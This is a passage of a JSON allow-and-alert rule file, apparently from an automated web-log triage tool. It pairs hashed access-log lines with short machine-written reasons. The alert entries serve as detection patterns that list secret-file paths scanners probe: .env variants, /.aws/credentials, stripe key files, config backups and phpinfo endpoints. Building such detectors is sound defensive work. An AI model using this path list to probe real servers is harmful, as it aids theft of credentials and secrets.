/api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.055 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:51.85571946Z" }, "f9f9abcabba6d3202ace04da5f8aef7ff5f8fa6774e17bf1c0cbf0544d537d66": { "type": "hash", "value": "f9f9abcabba6d3202ace04da5f8aef7ff5f8fa6774e17bf1c0cbf0544d537d66", "source": "auto", "reason": "Regular HTTP request resulting in 404 for /config.yml. This can be a normal probe or misconfiguration, not indicative of malicious activity.", "original_line": "\u001b[0mGET /config.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.717 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:11.081289266Z" }, "fa5c93b7125aefdac903cd283823c4c7e09b1f7d07167d47f5f40011850eb596": { "type": "hash", "value": "fa5c93b7125aefdac903cd283823c4c7e09b1f7d07167d47f5f40011850eb596", "source": "auto", "reason": "Looks like a routine HTTP GET request logged by an application/proxy (status 304) with response time; no signs of exploitation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.613 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:21.69983831Z" }, "fa9b5ab616b0d60100c9a71fac37fc73d50953069610509b009d4277409c6872": { "type": "hash", "value": "fa9b5ab616b0d60100c9a71fac37fc73d50953069610509b009d4277409c6872", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified); appears to be routine API polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.800 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:27.577371653Z" }, "fb1e82b00d015015644a3530f352f185f8bddebbe617d72ed9002a3a31bc57de": { "type": "hash", "value": "fb1e82b00d015015644a3530f352f185f8bddebbe617d72ed9002a3a31bc57de", "source": "auto", "reason": "Normal HTTP GET for robots.txt with standard 200 response and a small duration", "original_line": "\u001b[0mGET /robots.txt \u001b[32m200\u001b[\u003cDUR\u003e 0.627 ms - 26\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:39.105427899Z" }, "fb4e02253f74a2dbcc1a0f99c74409c0ecac67fbd79cfc941cd8600b049ef7d3": { "type": "hash", "value": "fb4e02253f74a2dbcc1a0f99c74409c0ecac67fbd79cfc941cd8600b049ef7d3", "source": "auto", "reason": "Looks like a routine HTTP GET to an API endpoint returning HTTP 304 (not modified) with a latency value; typical access log behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.681 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:00.713138962Z" }, "fb6fb307cc7f41f13cfacba94bc2872f4b7a837403ed115de83c8f6b7f285bae": { "type": "hash", "value": "fb6fb307cc7f41f13cfacba94bc2872f4b7a837403ed115de83c8f6b7f285bae", "source": "auto", "reason": "Normal API request/response cycle with HTTP 200. No anomalies detected.", "original_line": "\u001b[0mGET /api/settings \u001b[32m200\u001b[\u003cDUR\u003e 1.279 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:41.755372842Z" }, "fbaef459250800542c659ced5d4ecfeccb58bf8f62b4a12c613b67d53bef33e7": { "type": "hash", "value": "fbaef459250800542c659ced5d4ecfeccb58bf8f62b4a12c613b67d53bef33e7", "source": "auto", "reason": "Looks like a normal HTTP GET returning 304 (not modified) with routine response time; no exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.751 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:04.017821952Z" }, "fcb8acddafb3c066d921d1c4e8d4d413a18677e8148bd517cad92cae50b4fe2c": { "type": "hash", "value": "fcb8acddafb3c066d921d1c4e8d4d413a18677e8148bd517cad92cae50b4fe2c", "source": "auto", "reason": "Routine HTTP GET to an application logs API with a 304 status code and a response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.984 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:39.67702017Z" }, "fd6a5ec9abb83cfa78ac1642e7652e4294d75a1592cd35f87b48e412d6b496b6": { "type": "hash", "value": "fd6a5ec9abb83cfa78ac1642e7652e4294d75a1592cd35f87b48e412d6b496b6", "source": "auto", "reason": "HTTP GET to an API endpoint returning 304 (not modified) and a small latency looks like normal caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.188 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:24:48.825270984Z" }, "fd8fcb320d9c6fcc88d71dec4219eefc24cf0cab7bd06d90daf7ce76b13ff80c": { "type": "hash", "value": "fd8fcb320d9c6fcc88d71dec4219eefc24cf0cab7bd06d90daf7ce76b13ff80c", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.575 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:51.648110867Z" }, "fdb2e5f8f8f87ae3cb2b2fb7d1130983cf1c92d1fba9202f9f39d47bf1676cf7": { "type": "hash", "value": "fdb2e5f8f8f87ae3cb2b2fb7d1130983cf1c92d1fba9202f9f39d47bf1676cf7", "source": "auto", "reason": "HTTP GET request to an internal API endpoint with a 304 response and a normal latency; appears to be routine container/web access logging.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.232 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:27.773198486Z" }, "fe9597aea501114916184c80da138d16f4c07b82b2b7b4fc0692c551767023bf": { "type": "hash", "value": "fe9597aea501114916184c80da138d16f4c07b82b2b7b4fc0692c551767023bf", "source": "auto", "reason": "HTTP GET to an application logs endpoint returning 304 (not modified) with a small response time; looks like normal client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 36.137 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:03.735702442Z" }, "ffc5264ea67daeff57e2e23047754165a9e7e4563ff5c55963560757c966a8db": { "type": "hash", "value": "ffc5264ea67daeff57e2e23047754165a9e7e4563ff5c55963560757c966a8db", "source": "auto", "reason": "Looks like a routine HTTP GET returning 304 Not Modified with a response time; typical for normal API caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.685 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:42.913236942Z" } }, "prefixes": [ { "type": "prefix", "value": "GET /api/v2/user/apps/appData/api/logs?encoding=hex", "source": "llm", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a small response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.164 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:58.013880126Z" }, { "type": "prefix", "value": "GET /api/v1/settings", "source": "llm", "reason": "Normal API GET request to /api/v1/settings with typical 200 response", "original_line": "\u001b[0mGET /api/v1/settings \u001b[32m200\u001b[\u003cDUR\u003e 0.530 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:46.557277277Z" } ] }, "deny": {}, "alert": { "hashes": { "01db995517a58549e29b818b42ea54b74dbf84dc23631e9329f90a0de4e3d2cf": { "type": "hash", "value": "01db995517a58549e29b818b42ea54b74dbf84dc23631e9329f90a0de4e3d2cf", "source": "auto", "reason": "Request to a backend config file (settings.yml) returning 404, which may indicate probing for sensitive paths. Not definitive malicious, but warrants alerting.", "original_line": "\u001b[0mGET /backend/config/settings.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.475 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:37.165490099Z" }, "02c033c736a359cfd0585d2dd19d5fbe3930e9d40e19faf7d6e74a60a882db11": { "type": "hash", "value": "02c033c736a359cfd0585d2dd19d5fbe3930e9d40e19faf7d6e74a60a882db11", "source": "auto", "reason": "Access attempt to a sensitive file path (.env) resulting in 404; indicates potential probing activity.", "original_line": "\u001b[0mGET /web/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.789 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:01.189753725Z" }, "039e374bb71d4570cc4d2b2de0f00bdcea2c3c6d9f3c10d9457f6f271a58a616": { "type": "hash", "value": "039e374bb71d4570cc4d2b2de0f00bdcea2c3c6d9f3c10d9457f6f271a58a616", "source": "auto", "reason": "Request targets an internal-looking logs endpoint with hex encoding; could be normal but is often used for log retrieval/data exposure.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 50.835 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:03.991508649Z" }, "0649e1f627c4899e3d427b2330b74fe6aa63277bf6531d9651bfbbe92e52eff3": { "type": "hash", "value": "0649e1f627c4899e3d427b2330b74fe6aa63277bf6531d9651bfbbe92e52eff3", "source": "auto", "reason": "Access to /api/shared/config.env could indicate an attempt to retrieve sensitive environment configuration; status 200 does not guarantee legitimacy, so warrants monitoring.", "original_line": "\u001b[0mGET /api/shared/config.env \u001b[32m200\u001b[\u003cDUR\u003e 2.771 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:10.094319625Z" }, "077a753b57b8792a261ecd6031bc26f3c5ff4a1e82acc894973be5f84edd0866": { "type": "hash", "value": "077a753b57b8792a261ecd6031bc26f3c5ff4a1e82acc894973be5f84edd0866", "source": "auto", "reason": "Access to a .env path is commonly probed for sensitive configuration; though a 404, it indicates potential discovery attempts.", "original_line": "\u001b[0mGET /api/v2/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.808 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:51.901351691Z" }, "07b7dd81adea5b4c80c0c3f5d7eec11727c49c018e7a74cabb4ec6cb380d7e29": { "type": "hash", "value": "07b7dd81adea5b4c80c0c3f5d7eec11727c49c018e7a74cabb4ec6cb380d7e29", "source": "auto", "reason": "Access to /tmp/.env detected via HTTP GET returning 404, which is a common probe for sensitive file exposure.", "original_line": "\u001b[0mGET /tmp/.env \u001b[33m404\u001b[\u003cDUR\u003e 2.567 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:34.911517748Z" }, "08de835bde858d92ea610808c6de011858e1034baf1ee05227ac24b638aa9cd9": { "type": "hash", "value": "08de835bde858d92ea610808c6de011858e1034baf1ee05227ac24b638aa9cd9", "source": "auto", "reason": "Request to a sensitive file (.env) under /mail/ path indicating potential probing for configuration leakage.", "original_line": "\u001b[0mGET /mail/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.895 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:21.03564658Z" }, "0b158de938ac2821bf83be0c4ea48537755de28e87739e1c8b4756faef1a35d6": { "type": "hash", "value": "0b158de938ac2821bf83be0c4ea48537755de28e87739e1c8b4756faef1a35d6", "source": "auto", "reason": "Access to /server/.env commonly indicates probing for sensitive environment configuration files.", "original_line": "\u001b[0mGET /server/.env \u001b[33m404\u001b[\u003cDUR\u003e 2.130 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:56.144207596Z" }, "1198ae22197fdafa84423fd4b6468987ce73225199f4b1be2a01b10d7287652b": { "type": "hash", "value": "1198ae22197fdafa84423fd4b6468987ce73225199f4b1be2a01b10d7287652b", "source": "auto", "reason": "Request to a sensitive file (.env) resulting in 404; indicates probing/scan activity rather than a normal access pattern.", "original_line": "\u001b[0mGET /.env.test \u001b[33m404\u001b[\u003cDUR\u003e 0.540 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:39.921257876Z" }, "123bddccc9434d131f86d02589f0f53602d6e943b71f76d91e6ee22f5470e8b7": { "type": "hash", "value": "123bddccc9434d131f86d02589f0f53602d6e943b71f76d91e6ee22f5470e8b7", "source": "auto", "reason": "Request to a sensitive path (.env) without authorization; returns 404 but indicates potential probing for sensitive configuration files.", "original_line": "\u001b[0mGET /assets/.env \u001b[33m404\u001b[\u003cDUR\u003e 3.501 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:36.032440382Z" }, "16c3c699754af64475d6d9d35d100a899bb03e8eece498888acb918f9496da32": { "type": "hash", "value": "16c3c699754af64475d6d9d35d100a899bb03e8eece498888acb918f9496da32", "source": "auto", "reason": "Request targets a sensitive file (.env) which could indicate probing for secrets or misconfigured exposure. Not definitive malicious activity, but warrants alerting.", "original_line": "\u001b[0mGET /db/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.615 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:31.086414534Z" }, "1886b2697b5146908f5b7918db195b8a459dcc6144d27fd506f2fd225c203f04": { "type": "hash", "value": "1886b2697b5146908f5b7918db195b8a459dcc6144d27fd506f2fd225c203f04", "source": "auto", "reason": "Request for sensitive file /env/.env; received 404 which suggests probing activity rather than legitimate access", "original_line": "\u001b[0mGET /env/.env \u001b[33m404\u001b[\u003cDUR\u003e 7.615 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:40.386007483Z" }, "1980b310a8dcb5b626b0aea7c70ceaedfc0e35f8326301ce212633ba8090f140": { "type": "hash", "value": "1980b310a8dcb5b626b0aea7c70ceaedfc0e35f8326301ce212633ba8090f140", "source": "auto", "reason": "Access to the server's .env file via an API endpoint is unusual and could indicate probing for sensitive configuration.", "original_line": "\u001b[0mGET /api/shared/config/.env \u001b[32m200\u001b[\u003cDUR\u003e 0.535 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:06.66645322Z" }, "1a051e510620641517554f04695b3766d34cc1a2616ed2cbb7c8c8e1495c65f9": { "type": "hash", "value": "1a051e510620641517554f04695b3766d34cc1a2616ed2cbb7c8c8e1495c65f9", "source": "auto", "reason": "Request to /tests/.env with 404 status indicates probing for sensitive environment file; potential credential exposure scanning.", "original_line": "\u001b[0mGET /tests/.env \u001b[33m404\u001b[\u003cDUR\u003e 10.060 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:00.786770457Z" }, "1af75a1c80b96ab43befd537943f3b0857ba5f9dfc5898b032e525e466e8ece5": { "type": "hash", "value": "1af75a1c80b96ab43befd537943f3b0857ba5f9dfc5898b032e525e466e8ece5", "source": "auto", "reason": "Request to /.aws/credentials path with a 404 status; indicates probing for sensitive credential file.", "original_line": "\u001b[0mGET /.aws/credentials \u001b[33m404\u001b[\u003cDUR\u003e 0.648 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:50.332470334Z" }, "1b3ffc2f0e4cdcf20d8e8ea12efa0cfed3663a0113f0f9eaac172172f880e98b": { "type": "hash", "value": "1b3ffc2f0e4cdcf20d8e8ea12efa0cfed3663a0113f0f9eaac172172f880e98b", "source": "auto", "reason": "Request to /.env.uat is a common probe for sensitive env file exposure; 404 indicates not found but pattern suggests automated scanning", "original_line": "\u001b[0mGET /.env.uat \u001b[33m404\u001b[\u003cDUR\u003e 0.635 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:34.227931796Z" }, "1bebf653f67687db727b9e4f03532a3357f6da73442b0851ba2b35434b0e60e4": { "type": "hash", "value": "1bebf653f67687db727b9e4f03532a3357f6da73442b0851ba2b35434b0e60e4", "source": "auto", "reason": "HTTP 404 for a specific resource indicates possibly probing or missing asset; not obviously malicious but requires monitoring.", "original_line": "\u001b[0mGET /backup/stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 0.749 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:47.751308429Z" }, "1e68e5a1dced705dae3f578cdc25b60bd1821a517c3325719b23796922da30ca": { "type": "hash", "value": "1e68e5a1dced705dae3f578cdc25b60bd1821a517c3325719b23796922da30ca", "source": "auto", "reason": "Request to a sensitive file (.env) on the backend and a non-success status (404) suggests probing or misconfiguration attempts.", "original_line": "\u001b[0mGET /backend/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.663 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:11.763133701Z" }, "1f7b50fa615dbd97a59111e24725a99a3039bcf47b873c8d496ec3c5dbedd815": { "type": "hash", "value": "1f7b50fa615dbd97a59111e24725a99a3039bcf47b873c8d496ec3c5dbedd815", "source": "auto", "reason": "Request for sensitive environment file (.env) at web path; 404 indicates not found but could be probing for config data.", "original_line": "\u001b[0mGET /stripe/.env \u001b[33m404\u001b[\u003cDUR\u003e 2.232 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:33.018007228Z" }, "20a6f2064288d9d634d1ddf673c679fdb49e2e558d35b3b211f5bd90e17644fa": { "type": "hash", "value": "20a6f2064288d9d634d1ddf673c679fdb49e2e558d35b3b211f5bd90e17644fa", "source": "auto", "reason": "Access attempt to a sensitive/hidden file ( Pipelines config ) resulting in 404. Could indicate probing for config exposure.", "original_line": "\u001b[0mGET /.bitbucket/pipelines.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.566 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:18.220401505Z" }, "20c0bd11fba37aef79a1ccb3bade84b21ff23edc012ec20e314ec740cebdcc73": { "type": "hash", "value": "20c0bd11fba37aef79a1ccb3bade84b21ff23edc012ec20e314ec740cebdcc73", "source": "auto", "reason": "Access to a .env file path is commonly probed in reconnaissance or misconfiguration checks. Although it resulted in a 404, it indicates potential sensitive-file probing.", "original_line": "\u001b[0mGET /v1/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.571 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:12.814687623Z" }, "23682f096a2cd1308299e7e62ee4080622cdaaaea6ff698e5a0e4856dc81c884": { "type": "hash", "value": "23682f096a2cd1308299e7e62ee4080622cdaaaea6ff698e5a0e4856dc81c884", "source": "auto", "reason": "Requesting Symfony profiler phpinfo endpoint (/app_dev.php/_profiler/phpinfo) which is commonly probed by attackers to discover debug tooling; a 404 indicates not present but still a potential probe.", "original_line": "\u001b[0mGET /app_dev.php/_profiler/phpinfo \u001b[33m404\u001b[\u003cDUR\u003e 0.600 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:52.025656092Z" }, "28730397752880dd5c4928db4a185da2846d2dc785fc3cb32a627eb0c9a1aa13": { "type": "hash", "value": "28730397752880dd5c4928db4a185da2846d2dc785fc3cb32a627eb0c9a1aa13", "source": "auto", "reason": "Request to /.env.local could indicate probing for environment configuration files; 404 indicates not present but reconnaissance.", "original_line": "\u001b[0mGET /.env.local \u001b[33m404\u001b[\u003cDUR\u003e 0.504 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:23.521089514Z" }, "2d68bb0899ffeebb2d908c34a9286f2492a9d9e6eed9b511e2decefd85a6a46f": { "type": "hash", "value": "2d68bb0899ffeebb2d908c34a9286f2492a9d9e6eed9b511e2decefd85a6a46f", "source": "auto", "reason": "Access attempt to a sensitive file (.env_sample) via HTTP GET, which is a common probe for sensitive config exposure.", "original_line": "\u001b[0mGET /.env_sample \u001b[33m404\u001b[\u003cDUR\u003e 0.853 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:19:18.8507999Z" }, "2f726660a3a516b50a08fa4f3249f7b5b8111e9212dfc68203c0bd32857d1eb7": { "type": "hash", "value": "2f726660a3a516b50a08fa4f3249f7b5b8111e9212dfc68203c0bd32857d1eb7", "source": "auto", "reason": "Access to stripe_keys.json returning 404 could indicate probing for sensitive keys or misconfigured clients. Not an active attack, but warrants scrutiny.", "original_line": "\u001b[0mGET /stripe_keys.json \u001b[33m404\u001b[\u003cDUR\u003e 0.598 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:54.979427878Z" }, "3047d05401ba9c541afb0b6c3b3c8a30125e9ca98afe0a41b5ee84aff8fecdff": { "type": "hash", "value": "3047d05401ba9c541afb0b6c3b3c8a30125e9ca98afe0a41b5ee84aff8fecdff", "source": "auto", "reason": "HTTP GET to /api/v2/.../logs with encoding=hex may indicate log/telemetry retrieval; not clearly malicious but unusual enough to warrant scrutiny.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.155 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:21.726065778Z" }, "305b90030a6d9c140c51c98cd798fb0834634fe24201d2dbf7b353aec212f0f6": { "type": "hash", "value": "305b90030a6d9c140c51c98cd798fb0834634fe24201d2dbf7b353aec212f0f6", "source": "auto", "reason": "Request to /admin/.env is a common sensitive-file discovery probe.", "original_line": "\u001b[0mGET /admin/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.556 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:26.728244776Z" }, "31434daf9ebfd7deca666512b896e5b4253eb89b980db2b7a60ea3b8d8fabe73": { "type": "hash", "value": "31434daf9ebfd7deca666512b896e5b4253eb89b980db2b7a60ea3b8d8fabe73", "source": "auto", "reason": "Request to wp-config.php.bak that returned 404 suggests probing for sensitive configuration backups; unusual access pattern", "original_line": "\u001b[0mGET /wp-config.php.bak \u001b[33m404\u001b[\u003cDUR\u003e 0.595 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:13.169971352Z" }, "32278deb865603c76249c50679ef39afab18b53183e05c3e7666381aed018363": { "type": "hash", "value": "32278deb865603c76249c50679ef39afab18b53183e05c3e7666381aed018363", "source": "auto", "reason": "Access to the Laravel .env file is a common probe for sensitive configuration exposure.", "original_line": "\u001b[0mGET /laravel/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.533 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:14.672038998Z" }, "32605f8c6c5611c69279bf4a96b0242a38d9a6f004b7370f45792dad01046751": { "type": "hash", "value": "32605f8c6c5611c69279bf4a96b0242a38d9a6f004b7370f45792dad01046751", "source": "auto", "reason": "Request to a secrets.json path returned 404, which may indicate probing for sensitive files.", "original_line": "\u001b[0mGET /secrets/stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 2.356 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:42.851797509Z" }, "326764c67ca29ac99326541cc2a7200dffe233bfb54925ed8515ca3a5a2a7e1f": { "type": "hash", "value": "326764c67ca29ac99326541cc2a7200dffe233bfb54925ed8515ca3a5a2a7e1f", "source": "auto", "reason": "HTTP 404 for a stripe.json asset could indicate a misconfiguration or probing; not clearly malicious but worth monitoring.", "original_line": "\u001b[0mGET /storage/app/stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 0.671 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:30:01.16115247Z" }, "32cbbd53ddda31a0304afeee00aebef50f48fa34641a576c46b180eae4f6cd3c": { "type": "hash", "value": "32cbbd53ddda31a0304afeee00aebef50f48fa34641a576c46b180eae4f6cd3c", "source": "auto", "reason": "HTTP GET to a potentially sensitive file wp-content/debug.log returning 404; common probing pattern for sensitive file disclosure attempts.", "original_line": "\u001b[0mGET /wp-content/debug.log \u001b[33m404\u001b[\u003cDUR\u003e 1.219 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:27:13.838204216Z" }, "346f880e389669d722259a0733dc7a647dfaac7e6456c2a6138eb4986b8156e9": { "type": "hash", "value": "346f880e389669d722259a0733dc7a647dfaac7e6456c2a6138eb4986b8156e9", "source": "auto", "reason": "Access to a hidden file path /rest/.env returning 404 suggests a potential probe for sensitive environment configuration files. Not definitively malicious, but warrants alerting.", "original_line": "\u001b[0mGET /rest/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.551 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:23:05.700299825Z" }, "36f6dc101d41613eb737d22685961299c67783bb0180990496ced8f76ef51bf0": { "type": "hash", "value": "36f6dc101d41613eb737d22685961299c67783bb0180990496ced8f76ef51bf0", "source": "auto", "reason": "Request to access a sensitive file (.env.bak) commonly probed in reconnaissance attempts; not confirmed malicious but warrants attention.", "original_line": "\u001b[0mGET /.env.bak \u001b[33m404\u001b[\u003cDUR\u003e 0.894 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:51.577593703Z" }, "3724b243808373860ebe523a317179faabb3e95e0fd9fa00660bab64b48a56f5": { "type": "hash", "value": "3724b243808373860ebe523a317179faabb3e95e0fd9fa00660bab64b48a56f5", "source": "auto", "reason": "Access to /application/.env returned 404, which could indicate probing for sensitive environment files.", "original_line": "\u001b[0mGET /application/.env \u001b[33m404\u001b[\u003cDUR\u003e 10.243 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:27.081866322Z" }, "3a7595157e0e90dcb84b35e9cb73bebfb78a4729d0ef904043f91b2dff242b86": { "type": "hash", "value": "3a7595157e0e90dcb84b35e9cb73bebfb78a4729d0ef904043f91b2dff242b86", "source": "auto", "reason": "Access to a sensitive file path (/config/.env) via HTTP and a 404 response suggests probing for secrets.", "original_line": "\u001b[0mGET /config/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.689 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:24.444052094Z" }, "3bd0869d1b935a41a6cc0697002927cb6b7c0017c048fdc4809856ee0d392aca": { "type": "hash", "value": "3bd0869d1b935a41a6cc0697002927cb6b7c0017c048fdc4809856ee0d392aca", "source": "auto", "reason": "Access to a profiler endpoint (/ _profiler/phpinfo) that is commonly probed; encountered a 404 which is not a successful hit but indicates potential reconnaissance.", "original_line": "\u001b[0mGET /_profiler/phpinfo \u001b[33m404\u001b[\u003cDUR\u003e 0.555 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:34:46.070324185Z" }, "3c0c6629fe944ffbe5976d969e462552a1035011567140c5332bf7010644c490": { "type": "hash", "value": "3c0c6629fe944ffbe5976d969e462552a1035011567140c5332bf7010644c490", "source": "auto", "reason": "Direct access attempt to a sensitive file (.env) via HTTP leading to 404. This pattern is commonly used in reconnaissance or attempted data exposure.", "original_line": "\u001b[0mGET /payment/.env \u001b[33m404\u001b[\u003cDUR\u003e 0.624 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:20:22.432265578Z" }, "3c1a5d067e48f2298d6271123f015051fd6110eb0ef5e40cb74040842be2d064": { "type": "hash", "value": "3c1a5d067e48f2298d6271123f015051fd6110eb0ef5e40cb74040842be2d064", "source": "auto", "reason": "Access to a .bak file (backup-like extension) returning 404 could indicate probing for backups or sensitive files.", "original_line": "\u001b[0mGET /stripe.bak \u001b[33m404\u001b[\u003cDUR\u003e 2.265 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:31.760382377Z" }, "3d772975f14f0c05345adcd0c2afe7a5e2a41b25984c565f7474d5e34ffe2a58": { "type": "hash", "value": "3d772975f14f0c05345adcd0c2afe7a5e2a41b25984c565f7474d5e34ffe2a58", "source": "auto", "reason": "Access to /config/stripe.env 404 from a web request could indicate probing for sensitive config files.", "original_line": "\u001b[0mGET /config/stripe.env \u001b[33m404\u001b[\u003cDUR\u003e 0.666 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:17.648371938Z" }, "4417fd06e43b96d2c9e6241550961435b2ef64edc5d8a7c16323090baddbd417": { "type": "hash", "value": "4417fd06e43b96d2c9e6241550961435b2ef64edc5d8a7c16323090baddbd417", "source": "auto", "reason": "Access to a non-existent path /stripe.old resulting in a 404; could indicate probing for legacy endpoints or misconfigured routes.", "original_line": "\u001b[0mGET /stripe.old \u001b[33m404\u001b[\u003cDUR\u003e 1.009 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:36.062231939Z" }, "453666c5caa281d20c80f16fe28d3058f8cb94b482646f4673395f9182f86afe": { "type": "hash", "value": "453666c5caa281d20c80f16fe28d3058f8cb94b482646f4673395f9182f86afe", "source": "auto", "reason": "Access attempt to a sensitive file /old/.env reflected in a 404 response; pattern suggests potential probing for secrets.", "original_line": "\u001b[0mGET /old/.env \u001b[33m404\u001b[\u003cDUR\u003e 1.464 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:22:47.313838203Z" }, "45c57af45038a96ead19b1efb43e307ffa015b773328433378675f3d73811f69": { "type": "hash", "value": "45c57af45038a96ead19b1efb43e307ffa015b773328433378675f3d73811f69", "source": "auto", "reason": "HTTP 404 on a path that resembles sensitive keys (stripe.keys) indicates probing for secret files.", "original_line": "\u001b[0mGET /storage/stripe.keys \u001b[33m404\u001b[\u003cDUR\u003e 0.637 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:56.977269076Z" }, "47e51dc6b23e1d46ccac645cc9377bba76107d80729be3187b5258cf4099e5df": { "type": "hash", "value": "47e51dc6b23e1d46ccac645cc9377bba76107d80729be3187b5258cf4099e5df", 